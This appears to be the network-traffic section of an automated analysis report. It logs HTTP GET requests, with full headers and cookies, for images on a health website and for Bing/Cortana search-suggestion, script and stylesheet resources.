Source: global traffic	HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTspriority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=0a7fb7675443474b93e6e79ff4d6eb08 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=684fe7139df74817b053fa7d309b3c6b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic	HTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweowBkwGWAYkBggGGAcEBxAEwuQHHAQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C6oL0gTfBfwL4wrNCsAIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/3D/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ons&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=922546595914451b8005161047e609ff HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: GET /rb/6i/cir3,ortl,cc,nc/ZSlq2MSN0MvVwI58OcghaoHmrE4.css?bu=M-oK4wrwCuMK1AvjCtoL4wrjCuMK5QvjCuwL4wryC-MK-AvjCv4L4wqCC-MKiAvjCvwK4wrjCssL4wqXC-MKnQvjCpEL4wrjCq0LsAvjCuMKyAu2C-MKvAu_C-MKqgzjCoQM4wrlDA&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=onsc&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=41ddb61898e64595a74bb49d95e07614 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx
Source: global traffic	HTTP traffic detected: GET /rb/6i/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdIM4wrjCuMK4wrjCuMK4wrjCg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /th?id=OSK.7196ec0930733746a8b3b2917d333ff0&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/-iNIzuEypRdgRJ6xnyVHizZ3bpM.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Mon, 14 Oct 2024 19:26:35 GMTif-none-match: 0x8DCEC861E0B768Ecookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/15KwNJ1E2lA1HV6BbJRyAXYo44E.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/2a5zh0ZIpVSs0HhW1xQBRsZz1Ek.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Mon, 14 Oct 2024 19:38:35 GMTif-none-match: 0x8DCEC87CAFC6FD9cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/4TaH4o18x54UGQY5mQVwBbXDzpA.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/5qSqWyip_grL-s7BafaqI3Mrk9M.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Mon, 14 Oct 2024 19:42:59 GMTif-none-match: 0x8DCEC8868ADE5B1cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
